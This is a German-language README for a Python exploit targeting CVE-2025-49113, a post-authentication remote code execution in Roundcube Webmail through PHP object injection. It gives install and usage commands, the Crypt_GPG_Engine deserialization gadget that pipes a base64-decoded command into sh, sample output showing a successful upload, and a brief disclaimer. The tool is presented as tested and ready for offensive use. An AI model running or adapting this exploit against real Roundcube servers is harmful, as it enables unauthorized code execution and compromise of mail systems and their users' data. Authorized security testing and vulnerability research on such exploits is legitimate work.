
💥 Python-Exploit für CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection
CVE-ID: CVE-2025-49113
Exploit-Typ: Remote Code Execution (via PHP Object Injection)
Anwendung: Roundcube Webmail ≤ 1.5.9 und ≤ 1.6.10
Exploit-Sprache: Python
Autor: 00xCanelo
Status: Getestet und funktionsfähig auf verwundbaren Roundcube-Installationen
Dieser Exploit nutzt eine Schwachstelle in der Art und Weise aus, wie Roundcube Webmail hochgeladene Bilddateinamen behandelt, die als PHP-Objekte unserialisiert werden. Durch das Erstellen einer schädlichen Payload, die eine Crypt_GPG_Engine-Deserialisierungskette auslöst, kann eine Remote-Code-Ausführung nach der Authentifizierung erreicht werden.
Dieser Python-PoC imitiert die vom öffentlichen PHP-Exploit verwendete Angriffskette, jedoch mit saubererer Logik, optionaler Protokollierung und einfacher Handhabung in offensive Tooling-Setups.
pip install requestspython3 CVE-2025-49113.py <target_url> <username> <password> <command>
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'
Die PHP-Klasse Crypt_GPG_Engine erlaubt das Setzen eines _gpgconf-Feldes, das dann an die Shell-Ausführung übergeben wird.
Unsere Payload erstellt:
echo "<base64-encoded-cmd>" | base64 -d | sh
in _gpgconf, was bei der Deserialisierung zu RCE führt.
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
.
├── CVE-2025-49113.py # Python PoC script
└── README.md # This documentation
Dieser Code dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Jeglicher Missbrauch dieses Tools ist strengstens untersagt. Der Autor übernimmt keine Haftung für verursachte Schäden.